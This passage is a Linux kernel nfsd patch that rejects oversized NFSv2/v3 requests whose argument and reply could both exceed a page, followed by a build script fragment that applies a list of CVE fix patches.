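 *   provably small, so the call is allowed however large rq_arg.len is */
/* NFSv3 READ call padded past PAGE_SIZE with garbage: the reply may be
 *   large too, so rq_arg.len > PAGE_SIZE -> *statp = rpc_garbage_args  */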
Reported-by: Tuomas Haanpää <thaan@synopsys.com>
Reported-by: Ari Kauppi <ari@synopsys.com>
Cc: stable@vger.kernel.org
Reviewed-by: NeilBrown <neilb@suse.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
(cherry picked from commit e6838a29ecb484c97e4efef9429643b9851fba6e)
Change-Id: I7a049448dff17ffe5f9174fe07cd68495a838d40
Signed-off-by: Akshaya <akshayab@codeaurora.org>
---
fs/nfsd/nfssvc.c | 36 ++++++++++++++++++++++++++++++++++++
1 file changed, 36 insertions(+)
diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
index 752d56b..a89654b 100644
--- a/fs/nfsd/nfssvc.c
+++ b/fs/nfsd/nfssvc.c
@@ -646,6 +646,37 @@ static __be32 map_new_errors(u32 vers, __be32 nfserr)
return nfserr;
}
+/*
+ * A write procedure can have a large argument, and a read procedure can
+ * have a large reply, but no NFSv2 or NFSv3 procedure has argument and
+ * reply that can both be larger than a page. The xdr code has taken
+ * advantage of this assumption to be sloppy about bounds checking in
+ * some cases. Pending a rewrite of the NFSv2/v3 xdr code to fix that
+ * problem, we enforce these assumptions here:
+ */
+static bool nfs_request_too_big(struct svc_rqst *rqstp,
+ struct svc_procedure *proc)
+{
+ /*
+ * The ACL code has more careful bounds-checking and is not
+ * susceptible to this problem:
+ */
+ if (rqstp->rq_prog != NFS_PROGRAM)
+ return false;
+ /*
+ * Ditto NFSv4 (which can in theory have argument and reply both
+ * more than a page):
+ */
+ if (rqstp->rq_vers >= 4)
+ return false;
+ /* The reply will be small, we're OK: */
+ if (proc->pc_xdrressize > 0 &&
+ proc->pc_xdrressize < XDR_QUADLEN(PAGE_SIZE))
+ return false;
+
+ return rqstp->rq_arg.len > PAGE_SIZE;
+}
+
int
nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
{
@@ -658,6 +689,11 @@ nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
rqstp->rq_vers, rqstp->rq_proc);
proc = rqstp->rq_procinfo;
+ if (nfs_request_too_big(rqstp, proc)) {
+ dprintk("nfsd: NFSv%d argument too large\n", rqstp->rq_vers);
+ *statp = rpc_garbage_args;
+ return 1;
+ }
/*
* Give the xdr decoder a chance to change this if it wants
* (necessary in the NFSv4.0 compound case)
--
1.9.1


@@ -61,6 +61,7 @@ git apply $cvePatches/CVE-2017-6345/^4.9/0001.patch
 git apply $cvePatches/CVE-2017-6348/^4.9/0001.patch
 git apply $cvePatches/CVE-2017-6951/^3.14/0001.patch
 git apply $cvePatches/CVE-2017-7187/3.4/0001.patch
+git apply $cvePatches/CVE-2017-7187/3.4/0003.patch
 git apply $cvePatches/CVE-2017-7308/ANY/0003.patch
 git apply $cvePatches/CVE-2017-7487/ANY/0001.patch
 git apply $cvePatches/CVE-2017-8246/3.4/0002.patch